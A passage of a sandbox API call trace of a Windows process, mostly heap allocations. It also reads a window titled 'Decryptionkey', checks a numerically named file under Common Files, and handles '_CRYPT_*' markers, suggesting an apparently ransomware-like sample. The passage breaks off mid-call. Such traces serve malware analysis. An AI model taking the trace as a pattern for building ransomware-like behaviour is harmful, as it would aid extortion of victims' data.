(HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33ad8 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf200b8 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed95b0 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b98 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9610 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a98 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a88 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.552] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.552] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xd26ff8 [0274.552] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.553] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.553] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.553] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0274.553] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.553] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a98 | out: hHeap=0xcc0000) returned 1 [0274.553] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0274.553] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33b98 [0274.553] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0274.553] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a98 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a78 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a68 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0274.554] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xd27080 [0274.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e48 | out: hHeap=0xcc0000) returned 1 [0274.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbba8 | out: hHeap=0xcc0000) returned 1 [0274.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.554] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0274.555] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a98 | out: hHeap=0xcc0000) returned 1 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33a98 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbba8 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a78 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1fde8 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9460 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a58 [0274.555] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0274.555] SendMessageW (hWnd=0x800a2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xd [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1c) returned 0xf20248 [0274.555] GetWindowTextW (in: hWnd=0x800a2, lpString=0xf20248, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94f0 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20298 [0274.555] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a58 [0274.555] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20248 | out: hHeap=0xcc0000) returned 1 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9460 | out: hHeap=0xcc0000) returned 1 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1fde8 | out: hHeap=0xcc0000) returned 1 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a78 | out: hHeap=0xcc0000) returned 1 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33a78 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9460 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33a48 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a48 | out: hHeap=0xcc0000) returned 1 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb968 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1fde8 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba70 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a48 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba70 | out: hHeap=0xcc0000) returned 1 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20248 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba70 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb48 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf202c0 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed93d0 [0274.556] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a38 [0274.556] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed93d0 | out: hHeap=0xcc0000) returned 1 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e48 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed93d0 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9400 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf202e8 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb18 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a28 [0274.557] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb18 | out: hHeap=0xcc0000) returned 1 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20310 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb18 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb848 [0274.557] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20338 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9310 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a18 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbaa0 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee4860 [0274.558] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20360 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb758 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33a08 [0274.558] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb758 | out: hHeap=0xcc0000) returned 1 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20388 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb758 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba58 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339f8 [0274.558] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba58 | out: hHeap=0xcc0000) returned 1 [0274.558] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339f8 | out: hHeap=0xcc0000) returned 1 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf203b0 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba58 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339f8 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb878 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb60 [0274.558] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339e8 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb60 | out: hHeap=0xcc0000) returned 1 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339e8 | out: hHeap=0xcc0000) returned 1 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf203d8 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb60 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339e8 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedbb60 | out: hHeap=0xcc0000) returned 1 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20400 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedbb60 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb890 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339d8 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb890 | out: hHeap=0xcc0000) returned 1 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339d8 | out: hHeap=0xcc0000) returned 1 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20428 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb890 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339d8 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9640 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9520 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339c8 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9520 | out: hHeap=0xcc0000) returned 1 [0274.559] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339c8 | out: hHeap=0xcc0000) returned 1 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20450 [0274.559] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9520 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339c8 [0274.560] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9520 | out: hHeap=0xcc0000) returned 1 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20478 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9520 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba40 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339b8 [0274.560] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba40 | out: hHeap=0xcc0000) returned 1 [0274.560] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339b8 | out: hHeap=0xcc0000) returned 1 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf204a0 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba40 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339b8 [0274.560] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedba40 | out: hHeap=0xcc0000) returned 1 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf204c8 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedba40 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb980 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf339a8 [0274.560] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb980 | out: hHeap=0xcc0000) returned 1 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf204f0 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb980 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33998 [0274.560] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb8c0 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33998 | out: hHeap=0xcc0000) returned 1 [0274.561] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x8df2f8 | out: lpFindFileData=0x8df2f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xd, dwReserved1=0xcc75d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xf40e40 [0274.561] FindClose (in: hFindFile=0xf40e40 | out: hFindFile=0xf40e40) returned 1 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb8c0 | out: hHeap=0xcc0000) returned 1 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb980 | out: hHeap=0xcc0000) returned 1 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf204f0 | out: hHeap=0xcc0000) returned 1 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf339a8 | out: hHeap=0xcc0000) returned 1 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf204f0 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb980 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf339a8 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb8c0 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9370 [0274.561] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33998 [0274.561] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9370 | out: hHeap=0xcc0000) returned 1 [0274.562] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33998 | out: hHeap=0xcc0000) returned 1 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20518 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9370 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33998 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9550 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9490 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33988 [0274.562] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9490 | out: hHeap=0xcc0000) returned 1 [0274.562] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.562] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33988 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20540 [0274.562] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0274.562] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20540 | out: hHeap=0xcc0000) returned 1 [0274.562] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.562] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed9490 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48a8 [0274.563] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33988 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33978 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.563] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0274.563] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.563] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb7d0 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.563] PeekMessageW (in: lpMsg=0x8df234, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df234) returned 0 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33968 [0274.563] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33968 | out: hHeap=0xcc0000) returned 1 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9280 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb788 [0274.563] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33968 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9250 [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9250 | out: hHeap=0xcc0000) returned 1 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9250 [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.564] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.564] GetLastError () returned 0x0 [0274.564] SetLastError (dwErrCode=0x0) [0274.564] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9250 | out: hHeap=0xcc0000) returned 1 [0274.565] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.565] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.565] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e40 [0274.565] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20540 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9250 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33988 [0274.565] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9250 | out: hHeap=0xcc0000) returned 1 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9250 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.565] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20590 [0274.565] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.566] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33958 [0274.566] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0274.566] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33958 | out: hHeap=0xcc0000) returned 1 [0274.566] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf205b8 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33958 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20590 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.569] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33948 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.569] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33978 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: 